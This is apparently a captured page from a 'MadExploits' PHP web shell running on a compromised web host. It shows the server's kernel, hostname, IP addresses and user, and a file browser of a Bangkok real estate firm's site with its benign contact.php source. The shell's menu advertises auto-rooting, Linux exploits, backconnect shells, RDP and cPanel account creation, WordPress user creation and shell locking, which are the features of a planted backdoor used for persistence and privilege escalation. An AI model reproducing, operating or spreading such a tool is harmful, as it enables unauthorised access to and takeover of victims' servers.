Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.129.70.153
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Accel /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
about.php
5.28
KB
-rw-r--r--
contact.php
5.62
KB
-rw-r--r--
css.zip
3.61
MB
-rw-r--r--
index.php
28.45
KB
-rw-r--r--
listing-data.php
8.78
KB
-rw-r--r--
listing.php
12.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?php include("includes/header.php"); ?> <section class="contact-pg bc-gray pd-60"> <div class="custom-container"> <div class="heading-wrap"> <h1 class="title-h1 mb-15">got questions?</h1> <p class="fs-18 unset-caps">Get in touch with the team and we’ll get back to you and help as soon as we can!</p> </div> <div class="grids-3 contact-list gap-1 pd-60 "> <div class="accel-contact"> <img class="img-responsive" src="./icons/icon-mic.svg" width="64" height="64" alt="Trusted Property"> <h4 class="fs-18 mtb-16">Trusted by Bangkok’s media</h4> <p class="color-gray cpas">Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p> </div> <!-- 1 --> <div class="accel-contact"> <img class="img-responsive" src="./icons/icon-address.svg" width="64" height="64" alt="Find Property"> <h4 class="fs-18 mtb-16">Find us in Thailand</h4> <p class="color-gray cpas">Accel Real Estate Co., Ltd 30 Soi Sukhumvit 61, Khwaeng Khlong Tan Nuea, Khet Watthana, Bangkok 10110</p> </div> <!-- 1 --> <div class="accel-contact"> <img class="img-responsive" src="./icons/icon-contact-book.svg" width="64" height="64" alt="Contact Book"> <h4 class="fs-18 mtb-16">Contact Details</h4> <p class="color-gray cpas mb-15"><a class="color-gray" href="mailto:contact@accelrealestate.co.th">Contact@accelrealestate.co.th</a></p> <p class="color-gray cpas"><a class="color-gray" href="mailto:contact@accelrealestate.co.th">+64 0000 0000 0000</a></p> </div> <!-- 1 --> </div> <!-- section 2 --> <div class="dflex gap-60"> <div class="flex-1 contact-fm"> <h4 class="fs-24">Contact Us</h4> <div class="divider mtb-32"></div> <form method="post" action="#" id="contact-form"> <div class="row-clearfix"> <div class="input-div mb-15"> <label for="username">your name</label> <input type="text" id="username" class="news-input w-100 form-input" name="username" placeholder="Enter your name" required=""> </div> <div class="input-div mb-15"> <label for="user-email">your Email</label> <input type="email" id="user-email" class="news-input w-100 form-input" name="email" placeholder="test@mail.com" required=""> </div> <div class="input-div mb-15"> <label for="help-you">How can we help you?</label> <input type="text" id="help-you" class="news-input w-100 form-input" name="phone" placeholder="Help" required=""> </div> <div class="input-div mb-15"> <label for="more-info">What would you like to know?</label> <textarea id="more-info" class="news-input w-100 form-input" name="message" placeholder="Message"></textarea> </div> <div class="input-div"> <button class="comm-btn nowclick" type="submit" name="submit-form">Submit Now </button> </div> </div> </form> </div> <!-- left --> <style> </style> <div class="flex-1 faq-contact"> <h4 class="fs-24">Some frequently asked questions</h4> <div class="divider mtb-32"></div> <div class="faq-container"> <div class="faq"> <h3 class="faq-question flex-js-b fs-18">What services does your real estate company provide? </h3> <div class="faq-answer color-gray cpas"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations.</p> </div> </div> <div class="divider mtb-32"></div> <div class="faq"> <h3 class="faq-question flex-js-b fs-18">What areas do you cover?</h3> <div class="faq-answer color-gray cpas"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations..</p> </div> </div> <div class="divider mtb-32"></div> <div class="faq"> <h3 class="faq-question flex-js-b fs-18">How can I track my order?</h3> <div class="faq-answer color-gray cpas"> <p>Once your order is shipped, you will receive an email with the tracking information.</p> </div> </div> <div class="divider mtb-32"></div> <div class="faq"> <h3 class="faq-question flex-js-b fs-18">How do I start the process of buying a property?</h3> <div class="faq-answer color-gray cpas"> <p>Once your order is shipped, you will receive an email with the tracking information.</p> </div> </div> <div class="divider mtb-32"></div> <div class="faq"> <h3 class="faq-question flex-js-b fs-18">Can you help with financing?</h3> <div class="faq-answer color-gray cpas"> <p>Once your order is shipped, you will receive an email with the tracking information.</p> </div> </div> </div> </div> </div> </section> <?php include("includes/footer.php"); ?>
Close